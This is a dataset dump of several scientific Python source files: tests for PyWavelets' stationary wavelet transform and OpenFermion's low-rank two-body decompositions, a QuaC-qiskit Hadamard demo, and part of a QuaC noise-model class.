v[np.logical_not(i)] # global resels estimate: resels = np.sqrt(v / (4*log(2))) if mean: resels = resels.mean() return resels def randn1dnu(J, FWHM): ''' Nonuniformly smooth 1D Gaussian random continuum generator Parameters: J : sample size (integer) FWHM : one-dimensional NumPy array representing continuum smoothness Outputs: y : a random sample of J continua, each with length FWHM.size ''' Q = FWHM.size z = np.random.randn(Q, J) s = FWHM / ( (Q-1) * sqrt( 4*log(2) ) ) dx = 1. / (Q -1) x = np.array([dx * np.arange(Q)]) X = np.repeat(x, Q, 0) D = X - np.repeat(x.T, Q, 1) #; %distance matrix (relative to diagonal nodes) A = np.exp(-0.5*D**2 / (s**2) ) [U,V] = np.linalg.eig(A.T) U,V = np.real(U), np.real(V) U[U<eps] = 0 U,V = np.matrix(np.diag( np.sqrt(U) )), np.matrix(V) C = V * U * V.T y = (C * z).T return np.asarray(y) ```
{ "source": "0-tree/pywt", "score": 2 }
#### File: pywt/tests/test_swt.py ```python from __future__ import division, print_function, absolute_import import warnings from copy import deepcopy from itertools import combinations import numpy as np from numpy.testing import (run_module_suite, dec, assert_allclose, assert_, assert_equal, assert_raises, assert_array_equal, assert_warns) import pywt from pywt._extensions._swt import swt_axis # Check that float32 and complex64 are preserved. Other real types get # converted to float64. dtypes_in = [np.int8, np.float16, np.float32, np.float64, np.complex64, np.complex128] dtypes_out = [np.float64, np.float32, np.float32, np.float64, np.complex64, np.complex128] # tolerances used in accuracy comparisons tol_single = 1e-6 tol_double = 1e-13 #### # 1d multilevel swt tests #### def test_swt_decomposition(): x = [3, 7, 1, 3, -2, 6, 4, 6] db1 = pywt.Wavelet('db1') atol = tol_double (cA3, cD3), (cA2, cD2), (cA1, cD1) = pywt.swt(x, db1, level=3) expected_cA1 = [7.07106781, 5.65685425, 2.82842712, 0.70710678, 2.82842712, 7.07106781, 7.07106781, 6.36396103] assert_allclose(cA1, expected_cA1, rtol=1e-8, atol=atol) expected_cD1 = [-2.82842712, 4.24264069, -1.41421356, 3.53553391, -5.65685425, 1.41421356, -1.41421356, 2.12132034] assert_allclose(cD1, expected_cD1, rtol=1e-8, atol=atol) expected_cA2 = [7, 4.5, 4, 5.5, 7, 9.5, 10, 8.5] assert_allclose(cA2, expected_cA2, rtol=tol_double, atol=atol) expected_cD2 = [3, 3.5, 0, -4.5, -3, 0.5, 0, 0.5] assert_allclose(cD2, expected_cD2, rtol=tol_double, atol=atol) expected_cA3 = [9.89949494, ] * 8 assert_allclose(cA3, expected_cA3, rtol=1e-8, atol=atol) expected_cD3 = [0.00000000, -3.53553391, -4.24264069, -2.12132034, 0.00000000, 3.53553391, 4.24264069, 2.12132034] assert_allclose(cD3, expected_cD3, rtol=1e-8, atol=atol) # level=1, start_level=1 decomposition should match level=2 res = pywt.swt(cA1, db1, level=1, start_level=1) cA2, cD2 = res[0] assert_allclose(cA2, expected_cA2, rtol=tol_double, atol=atol) assert_allclose(cD2, expected_cD2, rtol=tol_double, atol=atol) coeffs = pywt.swt(x, db1) assert_(len(coeffs) == 3) assert_(pywt.swt_max_level(len(x)), 3) def test_swt_max_level(): # odd sized signal will warn about no levels of decomposition possible assert_warns(UserWarning, pywt.swt_max_level, 11) with warnings.catch_warnings(): warnings.simplefilter('ignore', UserWarning) assert_equal(pywt.swt_max_level(11), 0) # no warnings when >= 1 level of decomposition possible assert_equal(pywt.swt_max_level(2), 1) # divisible by 2**1 assert_equal(pywt.swt_max_level(4*3), 2) # divisible by 2**2 assert_equal(pywt.swt_max_level(16), 4) # divisible by 2**4 assert_equal(pywt.swt_max_level(16*3), 4) # divisible by 2**4 def test_swt_axis(): x = [3, 7, 1, 3, -2, 6, 4, 6] db1 = pywt.Wavelet('db1') (cA2, cD2), (cA1, cD1) = pywt.swt(x, db1, level=2) # test cases use 2D arrays based on tiling x along an axis and then # calling swt along the other axis. for order in ['C', 'F']: # test SWT of 2D data along default axis (-1) x_2d = np.asarray(x).reshape((1, -1)) x_2d = np.concatenate((x_2d, )*5, axis=0) if order == 'C': x_2d = np.ascontiguousarray(x_2d) elif order == 'F': x_2d = np.asfortranarray(x_2d) (cA2_2d, cD2_2d), (cA1_2d, cD1_2d) = pywt.swt(x_2d, db1, level=2) for c in [cA2_2d, cD2_2d, cA1_2d, cD1_2d]: assert_(c.shape == x_2d.shape) # each row should match the 1D result for row in cA1_2d: assert_array_equal(row, cA1) for row in cA2_2d: assert_array_equal(row, cA2) for row in cD1_2d: assert_array_equal(row, cD1) for row in cD2_2d: assert_array_equal(row, cD2) # test SWT of 2D data along other axis (0) x_2d = np.asarray(x).reshape((-1, 1)) x_2d = np.concatenate((x_2d, )*5, axis=1) if order == 'C': x_2d = np.ascontiguousarray(x_2d) elif order == 'F': x_2d = np.asfortranarray(x_2d) (cA2_2d, cD2_2d), (cA1_2d, cD1_2d) = pywt.swt(x_2d, db1, level=2, axis=0) for c in [cA2_2d, cD2_2d, cA1_2d, cD1_2d]: assert_(c.shape == x_2d.shape) # each column should match the 1D result for row in cA1_2d.transpose((1, 0)): assert_array_equal(row, cA1) for row in cA2_2d.transpose((1, 0)): assert_array_equal(row, cA2) for row in cD1_2d.transpose((1, 0)): assert_array_equal(row, cD1) for row in cD2_2d.transpose((1, 0)): assert_array_equal(row, cD2) # axis too large assert_raises(ValueError, pywt.swt, x, db1, level=2, axis=5) def test_swt_iswt_integration(): # This function performs a round-trip swt/iswt transform test on # all available types of wavelets in PyWavelets - except the # 'dmey' wavelet. The latter has been excluded because it does not # produce very precise results. This is likely due to the fact # that the 'dmey' wavelet is a discrete approximation of a # continuous wavelet. All wavelets are tested up to 3 levels. The # test validates neither swt or iswt as such, but it does ensure # that they are each other's inverse. max_level = 3 wavelets = pywt.wavelist(kind='discrete') if 'dmey' in wavelets: # The 'dmey' wavelet seems to be a bit special - disregard it for now wavelets.remove('dmey') for current_wavelet_str in wavelets: current_wavelet = pywt.Wavelet(current_wavelet_str) input_length_power = int(np.ceil(np.log2(max( current_wavelet.dec_len, current_wavelet.rec_len)))) input_length = 2**(input_length_power + max_level - 1) X = np.arange(input_length) coeffs = pywt.swt(X, current_wavelet, max_level) Y = pywt.iswt(coeffs, current_wavelet) assert_allclose(Y, X, rtol=1e-5, atol=1e-7) def test_swt_dtypes(): wavelet = pywt.Wavelet('haar') for dt_in, dt_out in zip(dtypes_in, dtypes_out): errmsg = "wrong dtype returned for {0} input".format(dt_in) # swt x = np.ones(8, dtype=dt_in) (cA2, cD2), (cA1, cD1) = pywt.swt(x, wavelet, level=2) assert_(cA2.dtype == cD2.dtype == cA1.dtype == cD1.dtype == dt_out, "swt: " + errmsg) # swt2 with warnings.catch_warnings(): warnings.simplefilter('ignore', FutureWarning) x = np.ones((8, 8), dtype=dt_in) cA, (cH, cV, cD) = pywt.swt2(x, wavelet, level=1)[0] assert_(cA.dtype == cH.dtype == cV.dtype == cD.dtype == dt_out, "swt2: " + errmsg) def test_swt_roundtrip_dtypes(): # verify perfect reconstruction for all dtypes rstate = np.random.RandomState(5) wavelet = pywt.Wavelet('haar') for dt_in, dt_out in zip(dtypes_in, dtypes_out): # swt, iswt x = rstate.standard_normal((8, )).astype(dt_in) c = pywt.swt(x, wavelet, level=2) xr = pywt.iswt(c, wavelet) assert_allclose(x, xr, rtol=1e-6, atol=1e-7) # swt2, iswt2 with warnings.catch_warnings(): warnings.simplefilter('ignore', FutureWarning) x = rstate.standard_normal((8, 8)).astype(dt_in) c = pywt.swt2(x, wavelet, level=2) xr = pywt.iswt2(c, wavelet) assert_allclose(x, xr, rtol=1e-6, atol=1e-7) def test_swt2_ndim_error(): x = np.ones(8) with warnings.catch_warnings(): warnings.simplefilter('ignore', FutureWarning) assert_raises(ValueError, pywt.swt2, x, 'haar', level=1) @dec.slow def test_swt2_iswt2_integration(wavelets=None): # This function performs a round-trip swt2/iswt2 transform test on # all available types of wavelets in PyWavelets - except the # 'dmey' wavelet. The latter has been excluded because it does not # produce very precise results. This is likely due to the fact # that the 'dmey' wavelet is a discrete approximation of a # continuous wavelet. All wavelets are tested up to 3 levels. The # test validates neither swt2 or iswt2 as such, but it does ensure # that they are each other's inverse. max_level = 3 if wavelets is None: wavelets = pywt.wavelist(kind='discrete') if 'dmey' in wavelets: # The 'dmey' wavelet is a special case - disregard it for now wavelets.remove('dmey') for current_wavelet_str in wavelets: current_wavelet = pywt.Wavelet(current_wavelet_str) input_length_power = int(np.ceil(np.log2(max( current_wavelet.dec_len, current_wavelet.rec_len)))) input_length = 2**(input_length_power + max_level - 1) X = np.arange(input_length**2).reshape(input_length, input_length) with warnings.catch_warnings(): warnings.simplefilter('ignore', FutureWarning) coeffs = pywt.swt2(X, current_wavelet, max_level) Y = pywt.iswt2(coeffs, current_wavelet) assert_allclose(Y, X, rtol=1e-5, atol=1e-5) def test_swt2_iswt2_quick(): test_swt2_iswt2_integration(wavelets=['db1', ]) def test_swt2_axes(): atol = 1e-14 current_wavelet = pywt.Wavelet('db2') input_length_power = int(np.ceil(np.log2(max( current_wavelet.dec_len, current_wavelet.rec_len)))) input_length = 2**(input_length_power) X = np.arange(input_length**2).reshape(input_length, input_length) with warnings.catch_warnings(): warnings.simplefilter('ignore', FutureWarning) (cA1, (cH1, cV1, cD1)) = pywt.swt2(X, current_wavelet, level=1)[0] # opposite order (cA2, (cH2, cV2, cD2)) = pywt.swt2(X, current_wavelet, level=1, axes=(1, 0))[0] assert_allclose(cA1, cA2, atol=atol) assert_allclose(cH1, cV2, atol=atol) assert_allclose(cV1, cH2, atol=atol) assert_allclose(cD1, cD2, atol=atol) # duplicate axes not allowed assert_raises(ValueError, pywt.swt2, X, current_wavelet, 1, axes=(0, 0)) # too few axes assert_raises(ValueError, pywt.swt2, X, current_wavelet, 1, axes=(0, )) def test_iswt2_2d_only(): # iswt2 is not currently compatible with data that is not 2D x_3d = np.ones((4, 4, 4)) with warnings.catch_warnings(): warnings.simplefilter('ignore', FutureWarning) c = pywt.swt2(x_3d, 'haar', level=1) assert_raises(ValueError, pywt.iswt2, c, 'haar') def test_swtn_axes(): atol = 1e-14 current_wavelet = pywt.Wavelet('db2') input_length_power = int(np.ceil(np.log2(max( current_wavelet.dec_len, current_wavelet.rec_len)))) input_length = 2**(input_length_power) X = np.arange(input_length**2).reshape(input_length, input_length) coeffs = pywt.swtn(X, current_wavelet, level=1, axes=None)[0] # opposite order coeffs2 = pywt.swtn(X, current_wavelet, level=1, axes=(1, 0))[0] assert_allclose(coeffs['aa'], coeffs2['aa'], atol=atol) assert_allclose(coeffs['ad'], coeffs2['da'], atol=atol) assert_allclose(coeffs['da'], coeffs2['ad'], atol=atol) assert_allclose(coeffs['dd'], coeffs2['dd'], atol=atol) # 0-level transform empty = pywt.swtn(X, current_wavelet, level=0) assert_equal(empty, []) # duplicate axes not allowed assert_raises(ValueError, pywt.swtn, X, current_wavelet, 1, axes=(0, 0)) # data.ndim = 0 assert_raises(ValueError, pywt.swtn, np.asarray([]), current_wavelet, 1) # start_level too large assert_raises(ValueError, pywt.swtn, X, current_wavelet, level=1, start_level=2) # level < 1 in swt_axis call assert_raises(ValueError, swt_axis, X, current_wavelet, level=0, start_level=0) # odd-sized data not allowed assert_raises(ValueError, swt_axis, X[:-1, :], current_wavelet, level=0, start_level=0, axis=0) @dec.slow def test_swtn_iswtn_integration(wavelets=None): # This function performs a round-trip swtn/iswtn transform for various # possible combinations of: # 1.) 1 out of 2 axes of a 2D array # 2.) 2 out of 3 axes of a 3D array # # To keep test time down, only wavelets of length <= 8 are run. # # This test does not validate swtn or iswtn individually, but only # confirms that iswtn yields an (almost) perfect reconstruction of swtn. max_level = 3 if wavelets is None: wavelets = pywt.wavelist(kind='discrete') if 'dmey' in wavelets: # The 'dmey' wavelet is a special case - disregard it for now wavelets.remove('dmey') for ndim_transform in range(1, 3): ndim = ndim_transform + 1 for axes in combinations(range(ndim), ndim_transform): for current_wavelet_str in wavelets: wav = pywt.Wavelet(current_wavelet_str) if wav.dec_len > 8: continue # avoid excessive test duration input_length_power = int(np.ceil(np.log2(max( wav.dec_len, wav.rec_len)))) N = 2**(input_length_power + max_level - 1) X = np.arange(N**ndim).reshape((N, )*ndim) coeffs = pywt.swtn(X, wav, max_level, axes=axes) coeffs_copy = deepcopy(coeffs) Y = pywt.iswtn(coeffs, wav, axes=axes) assert_allclose(Y, X, rtol=1e-5, atol=1e-5) # verify the inverse transform didn't modify any coeffs for c, c2 in zip(coeffs, coeffs_copy): for k, v in c.items(): assert_array_equal(c2[k], v) def test_swtn_iswtn_quick(): test_swtn_iswtn_integration(wavelets=['db1', ]) def test_iswtn_errors(): x = np.arange(8**3).reshape(8, 8, 8) max_level = 2 axes = (0, 1) w = pywt.Wavelet('db1') coeffs = pywt.swtn(x, w, max_level, axes=axes) # more axes than dimensions transformed assert_raises(ValueError, pywt.iswtn, coeffs, w, axes=(0, 1, 2)) # duplicate axes not allowed assert_raises(ValueError, pywt.iswtn, coeffs, w, axes=(0, 0)) # mismatched coefficient size coeffs[0]['da'] = coeffs[0]['da'][:-1, :] assert_raises(RuntimeError, pywt.iswtn, coeffs, w, axes=axes) def test_per_axis_wavelets(): # tests seperate wavelet for each axis. rstate = np.random.RandomState(1234) data = rstate.randn(16, 16, 16) level = 3 # wavelet can be a string or wavelet object wavelets = (pywt.Wavelet('haar'), 'sym2', 'db4') coefs = pywt.swtn(data, wavelets, level=level) assert_allclose(pywt.iswtn(coefs, wavelets), data, atol=1e-14) # 1-tuple also okay coefs = pywt.swtn(data, wavelets[:1], level=level) assert_allclose(pywt.iswtn(coefs, wavelets[:1]), data, atol=1e-14) # length of wavelets doesn't match the length of axes assert_raises(ValueError, pywt.swtn, data, wavelets[:2], level) assert_raises(ValueError, pywt.iswtn, coefs, wavelets[:2]) # swt2/iswt2 also support per-axis wavelets/modes data2 = data[..., 0] coefs2 = pywt.swt2(data2, wavelets[:2], level) assert_allclose(pywt.iswt2(coefs2, wavelets[:2]), data2, atol=1e-14) def test_error_on_continuous_wavelet(): # A ValueError is raised if a Continuous wavelet is selected data = np.ones((16, 16)) with warnings.catch_warnings(): # avoid FutureWarning in swt2 warnings.simplefilter('ignore', FutureWarning) for dec_func, rec_func in zip([pywt.swt, pywt.swt2, pywt.swtn], [pywt.iswt, pywt.iswt2, pywt.iswtn]): for cwave in ['morl', pywt.DiscreteContinuousWavelet('morl')]: assert_raises(ValueError, dec_func, data, wavelet=cwave, level=3) c = dec_func(data, 'db1', level=3) assert_raises(ValueError, rec_func, c, wavelet=cwave) if __name__ == '__main__': run_module_suite() ```
{ "source": "0tt3r/OpenFermion", "score": 2 }
#### File: openfermion/utils/_low_rank_test.py ```python import itertools import numpy import os import unittest from openfermion.config import THIS_DIRECTORY from openfermion.hamiltonians import MolecularData from openfermion.ops import FermionOperator from openfermion.transforms import get_fermion_operator from openfermion.utils import (chemist_ordered, eigenspectrum, get_chemist_two_body_coefficients, is_hermitian, low_rank_two_body_decomposition, low_rank_spatial_two_body_decomposition, normal_ordered, prepare_one_body_squared_evolution, random_interaction_operator) class ChemistTwoBodyTest(unittest.TestCase): def test_operator_consistency(self): # Initialize a random InteractionOperator and FermionOperator. n_qubits = 4 random_interaction = random_interaction_operator( n_qubits, real=False, seed=34281) random_fermion = get_fermion_operator(random_interaction) # Convert to chemist ordered tensor. io_constant, io_one_body_coefficients, io_chemist_tensor = \ get_chemist_two_body_coefficients(random_interaction) fo_constant, fo_one_body_coefficients, fo_chemist_tensor = \ get_chemist_two_body_coefficients(random_fermion) # Ensure consistency between FermionOperator and InteractionOperator. self.assertAlmostEqual(io_constant, fo_constant) one_body_difference = numpy.sum(numpy.absolute( io_one_body_coefficients - fo_one_body_coefficients)) self.assertAlmostEqual(0., one_body_difference) two_body_difference = numpy.sum(numpy.absolute( io_chemist_tensor - fo_chemist_tensor)) self.assertAlmostEqual(0., two_body_difference) # Convert output to FermionOperator. output_operator = FermionOperator() output_operator += FermionOperator((), fo_constant) # Convert one-body. for p, q in itertools.product(range(n_qubits), repeat=2): term = ((p, 1), (q, 0)) coefficient = fo_one_body_coefficients[p, q] output_operator += FermionOperator(term, coefficient) # Convert two-body. for p, q, r, s in itertools.product(range(n_qubits), repeat=4): term = ((p, 1), (q, 0), (r, 1), (s, 0)) coefficient = fo_chemist_tensor[p, q, r, s] output_operator += FermionOperator(term, coefficient) # Check that difference is small. difference = normal_ordered(random_fermion - output_operator) self.assertAlmostEqual(0., difference.induced_norm()) def test_exception(self): # Initialize a bad FermionOperator. n_qubits = 4 random_interaction = random_interaction_operator(n_qubits, seed=36229) random_fermion = get_fermion_operator(random_interaction) bad_term = ((1, 1), (2, 1)) random_fermion += FermionOperator(bad_term) # Check for exception. with self.assertRaises(TypeError): fo_constant, fo_one_body_coefficients, fo_chemist_tensor = ( get_chemist_two_body_coefficients(random_fermion)) class LowRankTest(unittest.TestCase): def test_operator_consistency(self): # Initialize a random two-body FermionOperator. n_qubits = 4 random_operator = get_fermion_operator( random_interaction_operator(n_qubits, seed=28644)) # Convert to chemist tensor. constant, one_body_coefficients, chemist_tensor = ( get_chemist_two_body_coefficients(random_operator)) # Build back operator constant and one-body components. decomposed_operator = FermionOperator((), constant) for p, q in itertools.product(range(n_qubits), repeat=2): term = ((p, 1), (q, 0)) coefficient = one_body_coefficients[p, q] decomposed_operator += FermionOperator(term, coefficient) # Perform decomposition. eigenvalues, one_body_squares, trunc_error = ( low_rank_two_body_decomposition(chemist_tensor)) self.assertFalse(trunc_error) # Check for exception. with self.assertRaises(ValueError): eigenvalues, one_body_squares, trunc_error = ( low_rank_two_body_decomposition(chemist_tensor, truncation_threshold=1., final_rank=1)) # Build back two-body component. for l in range(n_qubits ** 2): one_body_operator = FermionOperator() for p, q in itertools.product(range(n_qubits), repeat=2): term = ((p, 1), (q, 0)) coefficient = one_body_squares[l, p, q] one_body_operator += FermionOperator(term, coefficient) decomposed_operator += eigenvalues[l] * (one_body_operator ** 2) # Test for consistency. difference = normal_ordered(decomposed_operator - random_operator) self.assertAlmostEqual(0., difference.induced_norm()) def test_spatial_operator_consistency(self): # Initialize a random two-body FermionOperator. n_qubits = 4 filename = os.path.join(THIS_DIRECTORY, 'data', 'H2_sto-3g_singlet_0.7414') molecule = MolecularData(filename=filename) molecule_interaction = molecule.get_molecular_hamiltonian() molecule_operator = get_fermion_operator(molecule_interaction) constant = molecule_interaction.constant one_body_coefficients = molecule_interaction.one_body_tensor[:, :] two_body_coefficients = ( molecule_interaction.two_body_tensor[:, :, :, :]) # Perform decomposition. eigenvalues, one_body_squares, trunc_error, one_body_corrections = ( low_rank_spatial_two_body_decomposition(two_body_coefficients)) self.assertFalse(trunc_error) # Build back operator constant and one-body components. decomposed_operator = FermionOperator((), constant) for p, q in itertools.product(range(n_qubits), repeat=2): term = ((p, 1), (q, 0)) coefficient = (one_body_coefficients[p, q] + one_body_corrections[p, q]) decomposed_operator += FermionOperator(term, coefficient) # Check for exception. with self.assertRaises(ValueError): eigenvalues, one_body_squares, trunc_error = ( low_rank_spatial_two_body_decomposition( two_body_coefficients, truncation_threshold=1., final_rank=1)) # Build back two-body component. for l in range(one_body_squares.shape[0]): one_body_operator = FermionOperator() for p, q in itertools.product(range(n_qubits), repeat=2): term = ((p, 1), (q, 0)) coefficient = one_body_squares[l, p, q] one_body_operator += FermionOperator(term, coefficient) decomposed_operator += eigenvalues[l] * (one_body_operator ** 2) # Test for consistency. difference = normal_ordered(decomposed_operator - molecule_operator) self.assertAlmostEqual(0., difference.induced_norm()) # Decompose with slightly negative operator that must use eigen molecule = MolecularData(filename=filename) molecule.two_body_integrals[0, 0, 0, 0] -= 1 eigenvalues, one_body_squares, trunc_error, one_body_corrections = ( low_rank_spatial_two_body_decomposition(two_body_coefficients)) self.assertFalse(trunc_error) # Check for property errors with self.assertRaises(TypeError): eigenvalues, one_body_squares, trunc_error = ( low_rank_spatial_two_body_decomposition( two_body_coefficients + 0.01j, truncation_threshold=1., final_rank=1)) # Perform decomposition with threshold test_eigenvalues, one_body_squares, trunc_error, _ = ( low_rank_spatial_two_body_decomposition(two_body_coefficients, truncation_threshold=1.0)) self.assertTrue(len(test_eigenvalues) < len(eigenvalues)) self.assertTrue(len(one_body_squares) == len(test_eigenvalues)) self.assertTrue(trunc_error > 0.) # Perform decomposition with threshold test_eigenvalues, one_body_squares, trunc_error, _ = ( low_rank_spatial_two_body_decomposition(two_body_coefficients, final_rank=1)) self.assertTrue(len(test_eigenvalues) == 1) self.assertTrue(len(one_body_squares) == 1) self.assertTrue(trunc_error > 0.) def test_rank_reduction(self): # Initialize H2. geometry = [('H', (0., 0., 0.)), ('H', (0., 0., 0.7414))] basis = 'sto-3g' multiplicity = 1 filename = os.path.join(THIS_DIRECTORY, 'data', 'H2_sto-3g_singlet_0.7414') molecule = MolecularData( geometry, basis, multiplicity, filename=filename) molecule.load() # Get molecular Hamiltonian. molecular_hamiltonian = molecule.get_molecular_hamiltonian() # Get fermion Hamiltonian. fermion_hamiltonian = normal_ordered(get_fermion_operator( molecular_hamiltonian)) # Get chemist tensor. constant, one_body_coefficients, chemist_tensor = ( get_chemist_two_body_coefficients(fermion_hamiltonian)) n_qubits = one_body_coefficients.shape[0] # Rank reduce with threshold. errors = [] for truncation_threshold in [1., 0.1, 0.01, 0.001]: # Add back one-body terms and constant. decomposed_operator = FermionOperator((), constant) for p, q in itertools.product(range(n_qubits), repeat=2): term = ((p, 1), (q, 0)) coefficient = one_body_coefficients[p, q] decomposed_operator += FermionOperator(term, coefficient) # Rank reduce. eigenvalues, one_body_squares, trunc_error = ( low_rank_two_body_decomposition( chemist_tensor, truncation_threshold=truncation_threshold)) # Make sure error is below truncation specification. self.assertTrue(trunc_error < truncation_threshold) # Reassemble FermionOperator. l_max = eigenvalues.size for l in range(l_max): one_body_operator = FermionOperator() for p, q in itertools.product(range(n_qubits), repeat=2): term = ((p, 1), (q, 0)) coefficient = one_body_squares[l, p, q] one_body_operator += FermionOperator(term, coefficient) decomposed_operator += eigenvalues[l] * (one_body_operator**2) # Test for consistency. difference = normal_ordered( decomposed_operator - fermion_hamiltonian) errors += [difference.induced_norm()] self.assertTrue(errors[-1] <= trunc_error or abs(errors[-1] - trunc_error) < 1e-6) self.assertTrue(errors[3] <= errors[2] <= errors[1] <= errors[0]) # Rank reduce by setting final rank. errors = [] for final_rank in [4, 6, 8, 10, 12]: # Add back one-body terms and constant. decomposed_operator = FermionOperator((), constant) for p, q in itertools.product(range(n_qubits), repeat=2): term = ((p, 1), (q, 0)) coefficient = one_body_coefficients[p, q] decomposed_operator += FermionOperator(term, coefficient) # Rank reduce. eigenvalues, one_body_squares, trunc_error = ( low_rank_two_body_decomposition( chemist_tensor, final_rank=final_rank)) # Reassemble FermionOperator. l_max = eigenvalues.size for l in range(l_max): one_body_operator = FermionOperator() for p, q in itertools.product(range(n_qubits), repeat=2): term = ((p, 1), (q, 0)) coefficient = one_body_squares[l, p, q] one_body_operator += FermionOperator(term, coefficient) decomposed_operator += eigenvalues[l] * (one_body_operator**2) # Test for consistency. difference = normal_ordered( decomposed_operator - fermion_hamiltonian) errors += [difference.induced_norm()] self.assertTrue(errors[3] <= errors[2] <= errors[1] <= errors[0]) def test_one_body_square_decomposition(self): # Initialize a random two-body FermionOperator. n_qubits = 4 random_operator = get_fermion_operator( random_interaction_operator(n_qubits, seed=17004)) # Convert to chemist tensor. constant, one_body_coefficients, chemist_tensor = ( get_chemist_two_body_coefficients(random_operator)) # Perform decomposition. eigenvalues, one_body_squares, trunc_error = ( low_rank_two_body_decomposition(chemist_tensor)) # Build back two-body component. for l in range(n_qubits ** 2): # Get the squared one-body operator. one_body_operator = FermionOperator() for p, q in itertools.product(range(n_qubits), repeat=2): term = ((p, 1), (q, 0)) coefficient = one_body_squares[l, p, q] one_body_operator += FermionOperator(term, coefficient) one_body_squared = one_body_operator ** 2 # Get the squared one-body operator via one-body decomposition. density_density_matrix, basis_transformation_matrix = ( prepare_one_body_squared_evolution(one_body_squares[l])) two_body_operator = FermionOperator() for p, q in itertools.product(range(n_qubits), repeat=2): term = ((p, 1), (p, 0), (q, 1), (q, 0)) coefficient = density_density_matrix[p, q] two_body_operator += FermionOperator(term, coefficient) # Confirm that the rotations diagonalize the one-body squares. hopefully_diagonal = basis_transformation_matrix.dot( numpy.dot(one_body_squares[l], numpy.transpose(numpy.conjugate( basis_transformation_matrix)))) diagonal = numpy.diag(hopefully_diagonal) difference = hopefully_diagonal - numpy.diag(diagonal) self.assertAlmostEqual(0., numpy.amax(numpy.absolute(difference))) density_density_alternative = numpy.outer(diagonal, diagonal) difference = density_density_alternative - density_density_matrix self.assertAlmostEqual(0., numpy.amax(numpy.absolute(difference))) # Test spectra. one_body_squared_spectrum = eigenspectrum(one_body_squared) two_body_spectrum = eigenspectrum(two_body_operator) difference = two_body_spectrum - one_body_squared_spectrum self.assertAlmostEqual(0., numpy.amax(numpy.absolute(difference))) ```
{ "source": "0tt3r/QuaC-qiskit", "score": 3 }
#### File: examples/demos/hadamard_example.py ```python import math import matplotlib.pyplot as plt from qiskit import QuantumCircuit, execute from qiskit.tools.visualization import plot_histogram from quac_qiskit import Quac def main(): circuit1 = QuantumCircuit(5, 5) circuit2 = QuantumCircuit(5, 5) circuit3 = QuantumCircuit(1, 1) circuit1.h(0) circuit2.u2(0, math.pi, 0) circuit3.u3(math.pi/2, math.pi, 0, 0) circuit1.measure(0, 0) circuit2.measure(0, 0) circuit3.measure(0, 0) print("Available QuaC backends:") print(Quac.backends()) simulator = Quac.get_backend('fake_vigo_density_simulator', meas=True) # Execute the circuit on the QuaC simulator job1 = execute(circuit1, simulator) job2 = execute(circuit2, simulator) job3 = execute(circuit3, simulator) print(f"Hadamard counts: {job1.result().get_counts()}") print(f"U2 counts: {job2.result().get_counts()}") print(f"U3 counts: {job3.result().get_counts()}") plot_histogram(job1.result().get_counts()) plot_histogram((job2.result().get_counts())) plot_histogram(job3.result().get_counts()) plt.show() if __name__ == '__main__': main() ``` #### File: quac_qiskit/models/noise_model.py ```python from typing import List, Dict, Tuple, Optional, Union import warnings import numpy as np from scipy import sparse from qiskit.ignis.characterization import T1Fitter, T2Fitter, ZZFitter from qiskit.ignis.mitigation import TensoredMeasFitter from qiskit.result import Result from qiskit.providers import BaseBackend, BackendPropertyError class QuacNoiseModel: """Defines noise to be applied to QuaC-based simulations """ def __init__(self, t1_times: List[float], t2_times: List[float], meas_matrices: Optional[List[np.array]] = None, zz: Optional[Dict[Tuple[int, int], float]] = None): """Constructor for QuaC noise model :param t1_times: a list of floats representing T1 relaxation times :param t2_times: a list of floats representing T2 (note: not T2*) decoherence times :param meas_matrices: a list of 2x2 numpy arrays representing measurement probabilities. Given the matrix [[A, B], [C, D]] , A is the probability of measuring a qubit in state 0 given it was prepped in state 0, and C is the probability of measuring the qubit in state 1 given it was prepped in state 0. Similar logic can be applied to entries B and D :param zz: a dictionary mapping ordered pairs of qubits to ZZ coupling frequency in GHz. Please note this is in regular frequency, not angular frequency """ self._t1_times = t1_times self._t2_times = t2_times self._meas_matrices = meas_matrices self._full_meas_matrices = [] self._zz = zz def __str__(self): string_representation = "Noise Model Description\n==============================" if self.has_t1(): string_representation += "\nT1 times:" for qubit, time in enumerate(self._t1_times): string_representation += f"\n{qubit}: {time} ns" if self.has_t2(): string_representation += "\nT2 times:" for qubit, time in enumerate(self._t2_times): string_representation += f"\n{qubit}: {time} ns" if self.has_meas(): string_representation += "\nMeasurement error matrices:" for qubit, mat in enumerate(self._meas_matrices): string_representation += f"\n{qubit}: {mat}" if self.has_zz(): string_representation += "\nZZ coupling terms:" for pair, value in self._zz.items(): string_representation += f"\n{pair}: {value} GHz" return string_representation def has_t1(self) -> bool: """Check if T1 noise was defined :return: a boolean """ return not (float('inf') in self._t1_times and len(set(self._t1_times)) == 1) def has_t2(self) -> bool: """Check if T2 noise was defined :return: a boolean """ return not (float('inf') in self._t2_times and len(set(self._t2_times)) == 1) def has_meas(self) -> bool: """Check if measurement error was defined :return: a boolean """ return self._meas_matrices is not None def has_zz(self) -> bool: """Check if ZZ coupling noise was defined :return: a boolean """ return self._zz is not None def t1(self, qubit: int) -> float: """T1 getter method :param qubit: an integer :return: T1 time in nanoseconds """ return self._t1_times[qubit] def t2(self, qubit: int) -> float: """T2 getter method :param qubit: an integer :return: T2 time in nanoseconds """ return self._t2_times[qubit] def meas(self) -> List[sparse.csr_matrix]: """Measurement error matrix getter :return: a list of sparse matrices ready for application """ if len(self._full_meas_matrices) == 0: self.build_full_measurement_matrices() return self._full_meas_matrices def flip_prob(self, qubit: int, prep: int, meas: int): """The probability a qubit is in state meas after being prepared in state prep :param qubit: integer :param prep: integer (0 or 1) :param meas: integer (0 or 1) :return: a float """ return self._meas_matrices[qubit][prep][meas] def zz(self, qubit1: Optional[int] = None, qubit2: Optional[int] = None) -> Union[List[Tuple[int, int]], float]: """ZZ getter method :param qubit1: an integer :param qubit2: an integer :return: ZZ frequency in GHz (or a list of defined qubit pairs if either argument is None) """ if qubit1 is None or qubit2 is None: return list(self._zz.keys()) return self._zz[(qubit1, qubit2)] @staticmethod def get_noiseless_model(n_qubits: int): """Returns a QuacNoiseModel that is effectively noiseless :param n_qubits: number of qubits, an integer :return: a noiseless QuacNoiseModel """ return QuacNoiseModel([float('inf')] * n_qubits, [float('inf')] * n_qubits) @classmethod def from_backend(cls, backend: BaseBackend, **kwargs): """Automatically loads a QuaC noise model given a backend of type BaseBackend. Primarily for speeding up definition of IBMQ hardware noise models in QuaC :param backend: an object of type BaseBackend :param kwargs: an optional dictionary mapping strings to booleans stating which types of noise to include (keys are t1, t2, meas, and zz) :return: a QuacNoiseModel object """ n_qubits = len(backend.properties().qubits) qubits = list(range(n_qubits)) # Set up defaults t1_times = [float('inf') for _ in 